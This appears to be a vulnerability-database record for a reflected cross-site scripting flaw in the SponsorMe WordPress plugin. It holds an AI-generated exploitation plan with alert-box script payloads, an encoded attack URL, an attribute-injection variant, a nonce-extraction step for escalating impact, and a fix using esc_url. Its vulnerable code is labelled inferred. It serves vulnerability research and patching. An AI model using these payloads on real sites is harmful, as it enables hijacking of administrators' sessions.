[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRTBCuLkBj36kXiZwsGRcAljFyboZ0rn0TvMI--jbM-Y":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-8626","sponsorme-reflected-cross-site-scripting-via-phpself-parameter","SponsorMe \u003C= 0.5.2 - Reflected Cross-Site Scripting via PHP_SELF Parameter","The SponsorMe plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF Parameter in all versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The PHP_SELF value is reflected in two separate locations within the vulnerable function — a form action attribute and an anchor href attribute — both of which can be exploited by appending a crafted payload to the wp-admin\u002Fadmin.php URL path.","sponsorme",null,"\u003C=0.5.2","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-19 12:08:15","2026-05-20 01:25:50",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7df7f541-b8aa-46fa-bfca-b333beea27f9?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-8626 (SponsorMe \u003C= 0.5.2)\n\n## 1. Vulnerability Summary\nThe **SponsorMe** plugin for WordPress (up to version 0.5.2) is vulnerable to **Reflected Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin directly echoes the `PHP_SELF` server variable within an administrative page without applying proper escaping (e.g., `esc_url()` or `esc_attr()`). \n\nIn many PHP environments, `$_SERVER['PHP_SELF']` includes the \"Path Info\" portion of a URL. An attacker can append arbitrary HTML and JavaScript to the URL path. When the plugin renders its admin settings page, this payload is reflected into a form's `action` attribute and an anchor's `href` attribute, leading to script execution in the context of the victim's browser.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin.php`\n*   **Vulnerable Parameter:** URL Path Info (appended to `admin.php`).\n*   **Required Parameter:** The `page` query parameter must point to the SponsorMe settings page (e.g., `?page=sponsorme`).\n*   **Authentication:** Requires a logged-in user with permission to access the plugin's admin menu (typically `manage_options` for Administrators).\n*   **Preconditions:** The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An administrator navigates to the SponsorMe settings page via `\u002Fwp-admin\u002Fadmin.php?page=sponsorme`.\n2.  **Routing:** WordPress loads the menu callback function registered by SponsorMe (likely via `add_menu_page` or `add_options_page`).\n3.  **Vulnerable Function:** The callback function (e.g., `sponsorme_settings_page()` (inferred)) prepares the HTML for the settings interface.\n4.  **The Sink:**\n    *   The code contains a line similar to: `\u003Cform method=\"post\" action=\"\u003C?php echo $_SERVER['PHP_SELF']; ?>?page=sponsorme\">` (inferred).\n    *   Or: `\u003Ca href=\"\u003C?php echo $_SERVER['PHP_SELF']; ?>?action=delete...\">` (inferred).\n5.  **Reflection:** Because `$_SERVER['PHP_SELF']` is not passed through `esc_url()`, the appended path info is rendered raw in the HTML response.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Reflected XSS** vulnerability. The goal is to execute JavaScript in the victim's browser. \n*   **Do we need a nonce to trigger the XSS?** No. The vulnerability occurs during the `GET` request that renders the page. The reflection happens regardless of whether a nonce is present.\n*   **Do we need a nonce for the payload impact?** If the XSS payload is designed to perform a sensitive action (like creating a new admin), that action *will* require a nonce. \n\n**Acquisition for Payload Impact (if needed):**\nIf the payload needs to perform a CSRF-protected action (e.g., creating a user), the execution agent should:\n1.  Navigate to the target admin page.\n2.  Use `browser_eval` to extract the necessary nonce:\n    *   `browser_eval(\"document.querySelector('#_wpnonce_create-user')?.value\")`\n\n## 5. Exploitation Strategy\nThe exploit involves crafting a URL that breaks out of the HTML attributes where `PHP_SELF` is reflected.\n\n### Step-by-Step Plan:\n1.  **Identify the Page Slug:** Determine the exact `page` parameter used by SponsorMe. We will check the admin menu via WP-CLI.\n2.  **Craft the Payload:**\n    *   Since the reflection is inside an `action` attribute: `action=\"\u002Fwp-admin\u002Fadmin.php\u002F[PAYLOAD]?page=sponsorme\"`\n    *   Payload: `\"\u002F>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\"`\n    *   Encoded Payload: `%22%2F%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%3C`\n3.  **Construct the Final URL:**\n    `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin.php\u002F%22%2F%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%3C?page=sponsorme`\n4.  **Execute via Browser:** Use the `browser_navigate` tool to visit the URL as a logged-in administrator.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** `wp plugin install sponsorme --version=0.5.2 --activate`\n2.  **Verify Admin Slug:** \n    `wp menu list` (or check `wp-admin` manually) to confirm the page slug is `sponsorme` (inferred).\n3.  **Ensure Admin Access:** Use a standard administrator account for the browser session.\n\n## 7. Expected Results\n*   The server response will contain the literal string: `\u003Cform ... action=\"\u002Fwp-admin\u002Fadmin.php\u002F\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C?page=sponsorme\" ...>`\n*   The browser will interpret the `\u003C\u002Fform>` tag, closing the current form context.\n*   The browser will then encounter and execute the `\u003Cscript>` tag.\n*   An alert box showing the document domain will appear.\n\n## 8. Verification Steps\nAfter the `browser_navigate` call:\n1.  **Console Logs:** Check `browser_console_logs` for any script execution evidence or errors.\n2.  **Source Inspection:** Use `http_request` to fetch the same URL and grep for the payload to confirm reflection.\n    ```bash\n    # Note: Use the cookie from the logged-in session\n    http_request(url=\"...\u002Fwp-admin\u002Fadmin.php\u002F%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E%3C?page=sponsorme\")\n    ```\n3.  **DOM Verification:** Use `browser_eval(\"document.body.innerHTML.includes('alert(document.domain)')\")`.\n\n## 9. Alternative Approaches\nIf the `PHP_SELF` reflection is inside an `href` attribute of an `\u003Ca>` tag:\n*   **Payload:** `\"\u002Fonmouseover=\"alert(1)\"`\n*   **Mechanism:** This injects a new attribute rather than a new tag. The agent would then need to simulate a mouse movement over the injected link using `browser_mouse_move`.\n\nIf the reflection is specifically within a `value` attribute of a hidden input:\n*   **Payload:** `\">\u003Cscript>alert(1)\u003C\u002Fscript>`","The SponsorMe plugin for WordPress (up to 0.5.2) is vulnerable to Reflected Cross-Site Scripting because it directly echoes the unescaped PHP_SELF server variable in its admin interface. Attackers can exploit this by tricking a logged-in administrator into clicking a crafted link containing a script payload in the URL path, resulting in the execution of arbitrary JavaScript.","\u002F\u002F sponsorme.php (inferred from description)\n\u003Cform method=\"post\" action=\"\u003C?php echo $_SERVER['PHP_SELF']; ?>?page=sponsorme\">\n\n---\n\n\u002F\u002F sponsorme.php (inferred from description)\n\u003Ca href=\"\u003C?php echo $_SERVER['PHP_SELF']; ?>?page=sponsorme&action=delete\">Delete Settings\u003C\u002Fa>","--- a\u002Fsponsorme.php\n+++ b\u002Fsponsorme.php\n@@ -10,1 +10,1 @@\n- \u003Cform method=\"post\" action=\"\u003C?php echo $_SERVER['PHP_SELF']; ?>?page=sponsorme\">\n+ \u003Cform method=\"post\" action=\"\u003C?php echo esc_url($_SERVER['PHP_SELF']); ?>?page=sponsorme\">\n@@ -20,1 +20,1 @@\n- \u003Ca href=\"\u003C?php echo $_SERVER['PHP_SELF']; ?>?page=sponsorme&action=delete\">\n+ \u003Ca href=\"\u003C?php echo esc_url($_SERVER['PHP_SELF']); ?>?page=sponsorme&action=delete\">","The attacker targets the WordPress admin endpoint \u002Fwp-admin\u002Fadmin.php and appends an XSS payload to the URL path (e.g., \u002Fwp-admin\u002Fadmin.php\u002F%22%3E%3Cscript%3Ealert(1)%3C\u002Fscript%3E). The 'page' query parameter must be set to 'sponsorme' to ensure the vulnerable plugin code is executed. Because the plugin reflects the path information from $_SERVER['PHP_SELF'] directly into HTML attributes without using esc_url(), the payload breaks out of the attribute and executes in the context of the logged-in administrator's browser.","gemini-3-flash-preview","2026-05-20 16:50:27","2026-05-20 16:51:12",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsponsorme\u002Ftags"]